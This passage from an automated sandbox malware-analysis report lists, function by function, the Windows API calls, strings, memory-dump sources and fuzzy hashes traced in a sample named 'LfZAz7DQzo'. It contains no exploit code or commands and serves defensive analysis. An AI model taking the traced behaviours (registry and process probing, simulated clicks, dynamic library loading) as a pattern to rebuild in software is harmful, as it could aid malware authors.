                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F066EC
                                        • DestroyWindow.USER32(?), ref: 00F066F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                                        • Instruction ID: e5aea13638594fa44174b7ab1d1b1f0f7b07edd320d8add2cd53446f9d045672
                                        • Opcode Fuzzy Hash: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                                        • Instruction Fuzzy Hash: C1218B7160020AABEF104F64EC80EAB37ADEB59378F104629F911DA1E0DB72CC61B760
                                        Function 00EE703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EE705E
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE7091
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EE70A3
                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EE70DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHandle$FilePipe
                                        • String ID: nul
                                        • API String ID: 4209266947-2873401336
                                        • Opcode ID: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                                        • Instruction ID: e2397e376cdfc7955bff22e8446b5b67d6d49d8717c18912b049993d53ec1a58
                                        • Opcode Fuzzy Hash: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                                        • Instruction Fuzzy Hash: BE217C7460424DABDF209F6AE805A9A7BA8BF54724F205A19F8E0E72D0E7B09940DB50
                                        Function 00EE710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EE712B
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE715D
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EE716E
                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EE71A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHandle$FilePipe
                                        • String ID: nul
                                        • API String ID: 4209266947-2873401336
                                        • Opcode ID: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                                        • Instruction ID: 7e78fcbf33e1475e46a402463bf8eed604b02b093ea56b18f8072c726690bfc7
                                        • Opcode Fuzzy Hash: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                                        • Instruction Fuzzy Hash: 8F21A17560538DABDB209F6A9C04A9AB7E8BF55734F201619FCE0E32D0D7709841CB51
                                        Function 00EEAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEAEBF
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EEAF13
                                        • __swprintf.LIBCMT ref: 00EEAF2C
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0F910), ref: 00EEAF6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                                        • Instruction ID: c3fb27b88f8b41c5225471ff0ca75939c1a5fd4ccb51396a7169a59681b0ffa2
                                        • Opcode Fuzzy Hash: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                                        • Instruction Fuzzy Hash: 12216230A0010DAFCB10EB65CC85DAE77F8EF89704B0440A9F509AB252DB71EA45DB61
                                        Function 00EDA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00EDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                                          • Part of subcall function 00EDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                                          • Part of subcall function 00EDA37C: GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                                          • Part of subcall function 00EDA37C: AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                                        • GetFocus.USER32 ref: 00EDA554
                                          • Part of subcall function 00EDA3C5: GetParent.USER32(?), ref: 00EDA3D3
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDA59D
                                        • EnumChildWindows.USER32(?,00EDA615), ref: 00EDA5C5
                                        • __swprintf.LIBCMT ref: 00EDA5DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                                        • Instruction ID: 133408428f01606c98dfa09103af3870ba72b2829ec405158b394087af317661
                                        • Opcode Fuzzy Hash: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                                        • Instruction Fuzzy Hash: A611A871500208BBDF107F64DC85FEE37B9EF49700F045076B91C7A192CA759A469B75
                                        Function 00EE2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00EE2048
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 3964851224-769500911
                                        • Opcode ID: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                                        • Instruction ID: 77b9634dc3a599a4dd8d3fe8ed5ca6c7ecf31cb953dd0d7d47b583d626b8445f
                                        • Opcode Fuzzy Hash: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                                        • Instruction Fuzzy Hash: D9115B7190010D8FCF10EFA5D8914EEB7F4FF5A304F1094A9D995BB292EB32A90ADB50
                                        Function 00EFEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EFEF1B
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EFEF4B
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EFF07E
                                        • CloseHandle.KERNEL32(?), ref: 00EFF0FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                                        • Instruction ID: ebaeab9b44e2961e80318113dcfd8af52e47371c292b078884194fc78701563f
                                        • Opcode Fuzzy Hash: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                                        • Instruction Fuzzy Hash: 7F815271A043019FD724EF24CC86B7AB7E5AF88710F54981DF99EE7292DB70AC418B51
                                        Function 00F002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00388
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F003C7
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0040E
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F0043A
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00447
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                                        • Instruction ID: db42fe1e50867a36d1d2918625fbe5f271b727f366d803d90b3d7470b575c10c
                                        • Opcode Fuzzy Hash: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                                        • Instruction Fuzzy Hash: 04515931608204AFD714EB64CC81F6AB7E8FF84714F04892EF59997292DB31E905EB52
                                        Function 00EFDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDC3B
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDCBE
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EFDCDA
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDD1B
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDD35
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                                        • Instruction ID: cdfa1ede65c6af051dba894e73189fe9d8be354e1c22a6218a72f8fe4e394b8c
                                        • Opcode Fuzzy Hash: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                                        • Instruction Fuzzy Hash: E0513735A04209DFCB00EF68C8849ADFBF5FF59314B0991A9E919AB312DB31ED45CB91
                                        Function 00EEE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EEE88A
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EEE8B3
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EEE8F2
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EEE917
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EEE91F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: 1db55b195087f9707bd7d7b8469e731c722543e332d8016897ba243f58f69abd
                                        • Instruction ID: 58110e6377c354a6ea7e8f570cf878371f3b0ded508085281421e0d3fcbf09eb
                                        • Opcode Fuzzy Hash: 1db55b195087f9707bd7d7b8469e731c722543e332d8016897ba243f58f69abd
                                        • Instruction Fuzzy Hash: E251F935A00209DFCB15EF65C9819AEBBF5EF49314B189099E849BB362CB31ED11DB50
                                        Function 00F0A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                                        • Instruction ID: 0ab2bc54c0819d92d495cc0d06c95e17a474a9bb4b16e956708b4ddae732697f
                                        • Opcode Fuzzy Hash: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                                        • Instruction Fuzzy Hash: 7141DF39D00308AFD720DB28CC48FA9BBA9FB09320F154265F855E72E1D771AD41FA52
                                        Function 00E82344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00E82357
                                        • ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                        • GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                        • GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                                        • Instruction ID: 4390626a800e17e73e4541dfc1aed5ab5ab3f2213b4aac7b7e0e8ed9409accc9
                                        • Opcode Fuzzy Hash: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                                        • Instruction Fuzzy Hash: E341813550851AFBDF159FA8CC44AEABB74FB05324F20431AF92CA22A0C7355954EB91
                                        Function 00ED6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED695D
                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED69A9
                                        • TranslateMessage.USER32(?), ref: 00ED69D2
                                        • DispatchMessageW.USER32(?), ref: 00ED69DC
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED69EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                        • String ID:
                                        • API String ID: 2108273632-0
                                        • Opcode ID: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                                        • Instruction ID: dc1cbcda97e51cf8ddf16e9405a11e67b8895535ff01075779f16adcf92174e4
                                        • Opcode Fuzzy Hash: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                                        • Instruction Fuzzy Hash: B931E57150024AAEDB20CF74CC84BF67BA8EB13318F105167E825E22A1D775988BE791
                                        Function 00ED8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00ED8F12
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00ED8FBC
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ED8FC4
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00ED8FD2
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ED8FDA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
